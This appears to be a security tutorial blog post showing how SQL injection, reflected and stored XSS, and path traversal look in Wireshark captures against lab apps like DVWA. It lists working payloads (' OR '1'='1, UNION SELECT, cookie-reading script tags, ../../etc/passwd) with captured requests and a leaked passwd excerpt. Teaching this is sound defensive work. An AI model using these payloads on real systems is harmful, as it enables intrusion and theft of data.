These three vulnerabilities are among the most common ways attackers break into web applications. They all happen through normal-looking HTTP GET or POST requests , the same kind of traffic you see every day in a browser.
Wireshark lets you capture that traffic and look inside the actual requests and responses. You can see exactly what malicious input looks like when it travels over the wire, and how the server reacts (or fails to react).
Quick Wireshark Setup Reminder
1. Start a capture on your Wi-Fi or Ethernet interface.
2. Open a browser and interact with a test site (DVWA, Juice Shop, Mutillidae, or your own lab app).
3. Stop capture → apply display filter: http
4. Right-click interesting packets → Follow → HTTP Stream to see the full request + response in plain text.
1. SQL Injection in GET / POST
What it looks like in Wireshark
The attacker injects SQL fragments into query parameters (GET) or form fields (POST). Common payloads include:
1. ' OR '1'='1
2. admin' --
3. 1' UNION SELECT database(),user(),version() --
Captured example – GET request
GET /dvwa/vulnerabilities/sqli/?id=1'+OR+'1'='1&Submit=Submit HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 …
Accept: text/html,application/xhtml+xml,…
Cookie: security=low; PHPSESSID=abc123
Connection: keep-alive
Captured response fragment (if vulnerable)
First name: admin
Surname: admin
The server returned all records because the injected condition became always true.
Captured POST example
POST /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1
Host: 192.168.56.101
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
id=1'+OR+'1'='1&Submit=Submit
If the page loads without error or shows unexpected data, injection succeeded.
Quick exercise
1. Start Wireshark capture.
2. Open DVWA → SQL Injection (low security).
3. Try normal input → then ' OR '1'='1
4. Stop capture → filter http contains "OR"
5. Follow HTTP stream → compare normal vs injected request/response.
2. Cross-Site Scripting (XSS) – Reflected & Stored
What it looks like
Reflected: payload bounces back immediately in the response. Stored: payload is saved and shown later to other users.
Typical payloads:
1. <script>alert(1)</script>
2. <img src=x onerror=alert(1)>
3. "><script>alert(document.cookie)</script>
Captured reflected XSS (GET)
GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 192.168.56.101
Captured response
<h1>XSS (Reflected)</h1>
Hello <script>alert(1)</script>
The script is not escaped → it executes in the browser.
Captured stored XSS (POST)
POST /dvwa/vulnerabilities/xss_s/ HTTP/1.1
Host: 192.168.56.101
Content-Type: application/x-www-form-urlencoded
txtName=%3Cscript%3Ealert(document.cookie)%3C/script%3E&txtComment=Test&btnSign=Sign+Guestbook
Later GET requests to the guestbook page will contain the unescaped script.
Exercise
1. Capture traffic while doing reflected XSS in DVWA (low security).
2. Filter http contains "script".
3. Follow the stream → see the payload in both request and response.
4. Try to block it: switch DVWA to high security → repeat → payload appears escaped in response.
3. Directory Traversal / Path Traversal
What it looks like
Attacker uses ../ sequences to climb out of the intended folder and read system files.
Common payloads:
1. ../../etc/passwd
2. ..%2F..%2F..%2Fwindows%2Fwin.ini (URL-encoded)
3. ....//....//etc/passwd (double-dot bypass)
Captured GET example
GET /dvwa/vulnerabilities/file-upload/?page=../../../etc/passwd HTTP/1.1
Host: 192.168.56.101
Captured response (if vulnerable)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
…
The server leaked the passwd file.
Exercise
1. Start capture → open Mutillidae or DVWA File Inclusion page.
2. Try normal file view → then ?page=../../../etc/passwd
3. Filter http contains "../"
4. Follow stream → see the leaked file contents in the response body.
Quick Recap & Safety Notes
1. Use a local test environment (DVWA, Mutillidae, Juice Shop, WebGoat) , never practice on real/live sites.
2. Wireshark filter helpers: http.request.method == "POST"http contains "script"http contains "../"http contains "OR '1'='1"
3. Save captures as .pcapng for later study.
These three vulnerabilities are still in the OWASP Top 10 for a reason, they are easy to introduce and devastating when exploited. Seeing them in real HTTP traffic with Wireshark makes the theory much more concrete.
Try the exercises on a local VM, you’ll understand the attacks much better after watching them flow across the wire.
February 14, 2026
February 14, 2026
February 14, 2026
January 12, 2026
November 10, 2024
February 04, 2026
© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067
